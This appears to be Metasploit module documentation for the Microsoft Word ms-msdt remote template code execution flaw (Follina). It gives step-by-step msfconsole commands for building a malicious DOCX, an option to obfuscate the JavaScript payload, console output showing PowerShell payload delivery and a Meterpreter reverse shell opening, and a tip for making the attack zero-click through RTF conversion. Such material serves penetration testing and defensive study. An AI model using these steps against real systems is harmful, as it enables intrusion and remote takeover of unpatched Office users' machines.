There exists a vulnerability in Microsoft Word that leverages the remote template feature to achieveremote code execution against the target.

The vulnerability came to light after an independent cybersecurity research team known as `nao_sec` uncovered a Word document ([05-2022-0438.doc](https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/)) that was uploaded to VirusTotal from an IP address in Belarus.

The document uses the remote template feature to fetch an `HTML` document and then uses the `ms-msdt` scheme to execute `PowerShell` code.

## Vulnerable Application

The vulnerability has been proved in Office 2013, 2016, 2019, 2021, Office ProPlus and Office 365. It also applies to Windows itself, e.g. it can be called from `.lnk` files and with `wget` into `PowerShell`.

The vulnerability appears exploitable using `.RTF` files on all versions of Office 365, including current channel.

However, with Insider and Current builds of Office, it doesn't seem to work.

### Make your lab

You need official version of Microsoft Office installed. And stay unpatched for this.

Tested on Microsoft Windows 10 1909 w/ Microsoft Office Word 2016.

## Verification Steps

1. Start `msfconsole`
2. `use exploit/windows/fileformat/word_msdtjs_rce`
3. `set SRVHOST [IP]`
4. `set LHOST [IP]`
5. `run`

## Options

**CUSTOMTEMPLATE**

A DOCX file that will be used as a template to build the exploit.

**OBFUSCATE**

Obfuscate JavaScript content. Default: true

## Scenarios

### Basic use

1. Generate the exploit as following.

```
[*] Started reverse TCP handler on 172.20.32.36:4444 
[*] Using URL: http://172.20.32.36:8080/1GWqOqp7e1
[*] Server started.
[*] Generate a malicious docx file
[*] Using template '/tmp/payload.docx'
[*] Parsing item from template: docProps/
[*] Parsing item from template: docProps/core.xml
[*] Parsing item from template: docProps/app.xml
[*] Parsing item from template: word/
[*] Parsing item from template: word/theme/
[*] Parsing item from template: word/theme/theme1.xml
[*] Parsing item from template: word/styles.xml
[*] Parsing item from template: word/settings.xml
[*] Parsing item from template: word/document.xml
[*] Parsing item from template: word/_rels/
[*] Parsing item from template: word/_rels/document.xml.rels
[*] Parsing item from template: word/fontTable.xml
[*] Parsing item from template: word/webSettings.xml
[*] Parsing item from template: _rels/
[*] Parsing item from template: _rels/.rels
[*] Parsing item from template: [Content_Types].xml
[*] Injecting payload in docx document
[*] Finalizing docx 'msf.docx'
[+] msf.docx stored at /home/[REDACTED]/.msf4/local/msf.docx
[*] Powershell command length: 3724
```

2. Open the DOCX document on a remote vulnerable system.

```
[*] 172.20.32.36      word_msdtjs_rce - Sending HTML Payload
[*] 172.20.32.36      word_msdtjs_rce - Obfuscate JavaScript content
[*] 172.20.32.36      word_msdtjs_rce - Sending HTML Payload
[*] 172.20.32.36      word_msdtjs_rce - Obfuscate JavaScript content
[*] 172.20.32.36      word_msdtjs_rce - Sending HTML Payload
[*] 172.20.32.36      word_msdtjs_rce - Obfuscate JavaScript content
[*] 172.20.32.36      word_msdtjs_rce - Sending PowerShell Payload
[*] Sending stage (200262 bytes) to 172.20.32.36
[*] Meterpreter session 1 opened (172.20.32.36:4444 -> 172.20.32.36:42674 ) at 2022-05-30 19:32:37 +0400
```

### The 0-Click tip

You can get the 0-click by converting, manually, the `.docx` file generated by the module into a `.rtf` file format.

## References

  1. <https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/>
  2. <https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19>
  3. <https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/>
  4. <https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>
  5. <https://twitter.com/GossiTheDog/status/1531608245009367040>
  6. <https://github.com/JMousqueton/PoC-CVE-2022-30190>
